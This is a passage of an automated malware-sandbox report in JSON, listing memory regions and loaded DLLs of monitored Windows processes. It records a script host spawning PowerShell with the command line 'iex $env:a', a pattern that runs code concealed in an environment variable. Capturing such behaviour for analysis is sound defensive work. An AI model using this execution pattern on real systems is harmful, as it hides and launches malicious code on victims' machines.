"proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 42663936, "type": "region", "version": 1 }, "end_va": 43712511, "entry_point": 0, "filename": null, "id": "region_897", "name": "private_0x00000000028b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42663936, "timestamp": "00:01:21.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791619469312, "type": "region", "version": 1 }, "end_va": 8791619813375, "entry_point": 8791619469312, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_898", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791619469312, "timestamp": "00:01:21.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3346431, "entry_point": 3342336, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_899", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 3342336, "timestamp": "00:01:21.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 45613056, "type": "region", "version": 1 }, "end_va": 46137343, "entry_point": 0, "filename": null, "id": "region_900", "name": "private_0x0000000002b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 45613056, "timestamp": "00:01:21.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791750606848, "type": "region", "version": 1 }, "end_va": 8791750701055, "entry_point": 8791750606848, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_901", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791750606848, "timestamp": "00:01:21.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000902-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_902", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:21.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791747461120, "type": "region", "version": 1 }, "end_va": 8791747751935, "entry_point": 8791747461120, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_903", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791747461120, "timestamp": "00:01:21.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757963263, "entry_point": 8791757881344, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_904", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:21.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 46989312, "type": "region", "version": 1 }, "end_va": 47513599, "entry_point": 0, "filename": null, "id": "region_905", "name": "private_0x0000000002cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46989312, "timestamp": "00:01:22.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 47513600, "type": "region", "version": 1 }, "end_va": 48037887, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x0000000002d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 47513600, "timestamp": "00:01:22.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791756963840, "type": "region", "version": 1 }, "end_va": 8791757557759, "entry_point": 8791756963840, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_907", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791756963840, "timestamp": "00:01:22.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000908-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_908", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:22.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000909-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_909", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:22.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 929792, "start_va": 8791606165504, "type": "region", "version": 1 }, "end_va": 8791607095295, "entry_point": 8791606165504, "filename": "\\Windows\\System32\\jscript.dll", "id": "region_910", "name": "jscript.dll", "norm_filename": "c:\\windows\\system32\\jscript.dll", "region_type": "memory_mapped_file", "start_va": 8791606165504, "timestamp": "00:01:22.102", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791607148544, "type": "region", "version": 1 }, "end_va": 8791619432447, "entry_point": 8791607148544, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_911", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791607148544, "timestamp": "00:01:22.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 163840, "start_va": 8791714562048, "type": "region", "version": 1 }, "end_va": 8791714725887, "entry_point": 8791714562048, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_912", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 8791714562048, "timestamp": "00:01:22.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791710695424, "type": "region", "version": 1 }, "end_va": 8791710793727, "entry_point": 8791710695424, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_913", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791710695424, "timestamp": "00:01:22.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791762665472, "type": "region", "version": 1 }, "end_va": 8791776854015, "entry_point": 8791762665472, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_914", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791762665472, "timestamp": "00:01:22.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791711678464, "type": "region", "version": 1 }, "end_va": 8791711891455, "entry_point": 8791711678464, "filename": "\\Windows\\System32\\scrrun.dll", "id": "region_915", "name": "scrrun.dll", "norm_filename": "c:\\windows\\system32\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 8791711678464, "timestamp": "00:01:22.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 81920, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3489791, "entry_point": 3412080, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_916", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 3407872, "timestamp": "00:01:22.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 48037888, "type": "region", "version": 1 }, "end_va": 60321791, "entry_point": 48045016, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_917", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 48037888, "timestamp": "00:01:22.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32317439, "entry_point": 0, "filename": null, "id": "region_918", "name": "pagefile_0x0000000001ed0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32309248, "timestamp": "00:01:22.958", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000919-addr_0x0000000003990000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 60358656, "type": "region", "version": 1 }, "end_va": 61407231, "entry_point": 0, "filename": null, "id": "region_919", "name": "private_0x0000000003990000", "norm_filename": null, "region_type": "private_memory", "start_va": 60358656, "timestamp": "00:01:22.959", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32440319, "entry_point": 32378980, "filename": "\\Windows\\System32\\scrrun.dll", "id": "region_921", "name": "scrrun.dll", "norm_filename": "c:\\windows\\system32\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 32374784, "timestamp": "00:01:23.007", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 32444415, "entry_point": 0, "filename": null, "id": "region_922", "name": "pagefile_0x0000000001ef0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32440320, "timestamp": "00:01:23.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791734419456, "type": "region", "version": 1 }, "end_va": 8791735648255, "entry_point": 8791734419456, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_923", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791734419456, "timestamp": "00:01:23.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32514047, "entry_point": 0, "filename": null, "id": "region_924", "name": "pagefile_0x0000000001f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32505856, "timestamp": "00:01:23.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 32587775, "entry_point": 32571392, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_925", "name": "cversions.1.db", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 32571392, "timestamp": "00:01:23.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 110592, "start_va": 33226752, "type": "region", "version": 1 }, "end_va": 33337343, "entry_point": 33226752, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_926", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 33226752, "timestamp": "00:01:23.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 32641023, "entry_point": 0, "filename": null, "id": "region_927", "name": "pagefile_0x0000000001f20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32636928, "timestamp": "00:01:23.040", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000928-addr_0x0000000003a90000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 61407232, "type": "region", "version": 1 }, "end_va": 62459903, "entry_point": 0, "filename": null, "id": "region_928", "name": "private_0x0000000003a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 61407232, "timestamp": "00:01:23.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758073855, "entry_point": 8791758012416, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_931", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:23.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 32587775, "entry_point": 32571392, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_932", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 32571392, "timestamp": "00:01:23.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 43909119, "entry_point": 43712512, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", "id": "region_933", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "region_type": "memory_mapped_file", "start_va": 43712512, "timestamp": "00:01:23.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33374207, "entry_point": 33357824, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_934", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:01:23.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 44326911, "entry_point": 43909120, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_935", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 43909120, "timestamp": "00:01:23.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791761354752, "type": "region", "version": 1 }, "end_va": 8791761575935, "entry_point": 8791761354752, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_936", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791761354752, "timestamp": "00:01:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791761616896, "type": "region", "version": 1 }, "end_va": 8791761723391, "entry_point": 8791761616896, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_937", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791761616896, "timestamp": "00:01:23.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791793467392, "type": "region", "version": 1 }, "end_va": 8791795396607, "entry_point": 8791793467392, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_938", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791793467392, "timestamp": "00:01:23.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 62849024, "type": "region", "version": 1 }, "end_va": 63373311, "entry_point": 0, "filename": null, "id": "region_1239", "name": "private_0x0000000003bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62849024, "timestamp": "00:01:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001240-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_1240", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001241-addr_0x0000000002c50000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 46465024, "type": "region", "version": 1 }, "end_va": 46989311, "entry_point": 0, "filename": null, "id": "region_1241", "name": "private_0x0000000002c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 46465024, "timestamp": "00:01:32.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 63373312, "type": "region", "version": 1 }, "end_va": 73007103, "entry_point": 63373312, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1242", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 63373312, "timestamp": "00:01:32.409", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" iex $env:a", "filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_6", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00000939-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_939", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:23.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000940-addr_0x0000000000030000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 262143, "entry_point": 0, "filename": null, "id": "region_940", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:23.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_941", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:23.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_942", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:23.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_943", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:23.169", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000944-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:23.169", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000945-addr_0x0000000000100000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1310719, "entry_point": 0, "filename": null, "id": "region_945", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:23.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 564592640, "type": "region", "version": 1 }, "end_va": 565059583, "entry_point": 564592640, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_946", "name": "powershell.exe", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 564592640, "timestamp": "00:01:23.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007498752, "type": "region", "version": 1 }, "end_va": 2009239551, "entry_point": 2007498752, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_947", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007498752, "timestamp": "00:01:23.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009464832, "type": "region", "version": 1 }, "end_va": 2011037695, "entry_point": 2009464832, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_948", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009464832, "timestamp": "00:01:23.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_949", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:23.254", "type": "region", "version": 1 }, { "dump": { "filename": 